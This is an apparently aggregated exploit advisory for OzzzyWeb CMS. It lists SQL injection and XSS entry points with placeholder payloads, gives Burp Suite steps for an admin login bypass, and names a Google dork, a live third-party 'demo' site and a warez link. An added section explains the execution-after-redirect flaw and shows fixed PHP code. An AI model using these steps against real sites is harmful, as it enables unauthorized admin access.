OzzzyWeb CMS Multiple Vulnerabilities - CXSecurity.com

Vulnerability ID 1809045  Vulnerability type
Published 2019-11-03  Updated 2019-11-03
CVE ID N/A  CNNVD-ID N/A
Platform N/A  CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019110013
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Vulnerability exploit
/***********************************************************************************
** Exploit Title: OzzzyWeb CMS Multiple Vulnerabilities
**
** Exploit Author:  z3r0fy
**
** Vendor Homepage : http://wwww.ozzzyweb.com/
**
** Download (Warez) : http://agrovipkimya.com/alfa.zip
**
** Google Dork : Copyright 2015 @ Ozzzy Akıllı Web Panelleri
**
** Tested on:  ParrotOS
**
** Demo : http://agrovipkimya.com/
**
************************************************************************************

WLB 1 : SQL Injection :

http://vulnerabletarget.com/urundetay.php?=[SQL Payload]

Vulnerable Code : Line 367, 365

----------------

WLB 2 : Cross Site Scripting :

http://vulnerabletarget.com/admin/sayfalar/dosya.php?urun_id=[XSS Payload]

Vulnerable Code : Line 95, 19

-------------------------------

WLB 3 : Admin Authentication Bypass

http://vulnerabletarget.com/admin/anasayfa.html

PoC :

Step 1 : Open Burp Suite

Step 2 : Add a Match and Replace rule

Step 3 : Add this match

Type : Request Header
Match : 30[12] FOUND
Replace : 200 OK
Comment : Bypass

Step 4 : Reload the /admin/anasayfa.html page.

***********************************************************************************
Twitter.com/z3r0fy
T.me/z3r0fy
***********************************************************************************
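The WLB 3 bypass works only if the server already writes the protected admin markup into the body of its 301/302 response: the browser normally follows the redirect and discards that body, and rewriting the status to 200 simply makes it render. The usual root cause is an authentication guard that sends a Location header but does not stop executing (execution after redirect). The snippet below is an added illustration, not OzzzyWeb's code (the advisory does not publish the lines it references); the function names and the /admin/login.php path are placeholders chosen here.

```php
<?php
// Hypothetical PHP authentication guard for an admin page such as
// admin/anasayfa.html. NOT the vendor's code; it contrasts the defective
// pattern behind a "302 -> 200" bypass with the corrected one.

session_start();

// Defective guard: the redirect header is sent, but the script keeps running,
// so everything rendered after the call is still placed in the 302 body.
function require_admin_defective(): void
{
    if (empty($_SESSION['admin'])) {
        header('Location: /admin/login.php'); // placeholder login page
        // no exit here: execution continues into the protected markup
    }
}

// Corrected guard: stop the script immediately after the redirect header,
// so an unauthenticated request receives a 302 with an empty body.
function require_admin(): void
{
    if (empty($_SESSION['admin'])) {
        header('Cache-Control: no-store');           // do not cache the redirect
        header('Location: /admin/login.php', true, 302);
        exit;                                        // nothing below is sent
    }
}

require_admin();
?>
<!-- Reached only when the session check above passed -->
<h1>Admin panel</h1>
```

To confirm a fix, request the admin URL without a session cookie and check that the 302 response carries no page content; the same check belongs in the application's regression tests.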